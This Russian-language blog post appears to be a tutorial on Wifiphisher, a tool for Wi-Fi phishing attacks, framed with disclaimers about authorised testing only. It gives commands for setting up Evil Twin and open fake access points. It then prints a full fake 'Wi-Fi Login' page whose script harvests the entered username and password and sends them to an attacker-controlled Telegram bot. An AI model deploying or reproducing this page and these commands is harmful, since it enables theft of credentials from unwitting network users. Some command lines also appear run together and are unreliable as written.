Мы же помним — закон наше все, и соблюдать законодательные требования можно и нужно. А значит — все, что ниже — это только для тестирования, и то — после разрешения владельца сети. Итак — поехали!
Каждый день появляются новые способы взлома Wi-Fi сетей, что заставляет владельцев уделять больше внимания защите. Один из инструментов, который позволяет проверить уязвимость вашей Wi-Fi сети — это Wifiphisher.
Wifiphisher — мощная библиотека с открытым исходным кодом, разработанная для тестирования защиты Wi-Fi сетей с помощью атак социальной инженерии. Давайте разберёмся, как работает этот инструмент, какие сценарии он поддерживает и как его можно использовать.
Основные возможности Wifiphisher
Wifiphisher может создавать поддельные Wi-Fi сети, имитирующие настоящие. Это помогает проверить, насколько пользователи склонны подключаться к ненадёжным сетям.
Инструмент отключает пользователей от их текущей Wi-Fi сети и перенаправляет их на поддельную точку доступа, где злоумышленник может собирать данные.
Wifiphisher предоставляет возможность настроить поддельные страницы входа, чтобы убедиться, что пользователи не вводят свои пароли на ненадёжных ресурсах.
Библиотека поддерживает различные шаблоны атак и сценарии, которые можно настроить под конкретные нужды.
Как установить Wifiphisher
Установка Wifiphisher довольно проста, но важно отметить, что инструмент работает только в Linux. Вот основные шаги:
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher sudo python3 setup.py install
sudo wifiphisher
Примеры использования Wifiphisher
Сценарий 1: Тестирование устойчивости сети к атаке Evil Twin
sudo wifiphisher --essid "MyHomeWiFi" --channel 6
sudo wifiphisher --phishing-page-name "credentials"
Сценарий 2: Создание открытой поддельной точки доступа
sudo wifiphisher --essid "FreeWiFi" --channel 11
tail -f /var/log/wifiphisher.log
sudo wifiphisher --plugin "plugin_name"
Сценарий 3: Перехват данных через фишинговую страницу
В дополнение к встроенным шаблонам Wifiphisher вы можете создать свою кастомную страницу для перехвата паролей. Вот пример кода простой страницы авторизации, которая выводит форму авторизации, а после — отправляет полученные данные в Телеграм (как это делать (один из вариантов) — я писал здесь:
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Wi-Fi Login</title> <style> body { font-family: Arial, sans-serif; text-align: center; margin-top: 50px; } .login-box { width: 300px; padding: 40px; border-radius: 10px; box-shadow: 0 0 15px rgba(0,0,0,0.2); background-color: #f1f1f1; margin: auto; } input[type="text"], input[type="password"] { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd; border-radius: 5px; } button { width: 100%; padding: 10px; background-color: #4CAF50; color: white; border: none; border-radius: 5px; cursor: pointer; } button:hover { background-color: #45a049; } </style> </head> <body> <div class="login-box"> <h2>Wi-Fi Login</h2> <form id="loginForm"> <input type="text" id="username" placeholder="Wi-Fi Username" required> <input type="password" id="password" placeholder="Wi-Fi Password" required> <button type="button" onclick="submitForm()">Submit</button> </form> </div> <script> function submitForm() { var username = document.getElementById('username').value; var password = document.getElementById('password').value; // Создаем сообщение для отправки в Telegram var message = "Получены данные:\nИмя пользователя: " + username + "\nПароль: " + password; // Отправка данных в Telegram через API var botToken = 'YOUR_BOT_TOKEN'; // Замените на свой токен var chatId = 'YOUR_CHAT_ID'; // Замените на свой chat_id var url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`; // Отправляем данные с помощью XMLHttpRequest var xhr = new XMLHttpRequest(); xhr.open('GET', url, true); xhr.send(); // Уведомление, что данные отправлены alert('Ваши данные были отправлены!'); } </script> </body> </html>
И — краткое заключение:
Важно понимать, что Wifiphisher предназначен только для этичного хакинга 🙂 Использовать его для тестирования чужих сетей без разрешения владельца — это нарушение закона. Инструмент создан, чтобы помочь специалистам по кибербезопасности выявлять слабые места в защите и предотвращать возможные атаки.
Спасибо за внимание. Как всегда — в случае возникновения вопросов пишите на почту, или в Телеграм.
Support the Blog!
Running a blog takes a lot of effort, time, and passion. Your donations help improve the content, inspire new ideas, and keep the project going.
If you’ve enjoyed the blog’s materials, any support would mean the world to me. Thank you for being here! ❤️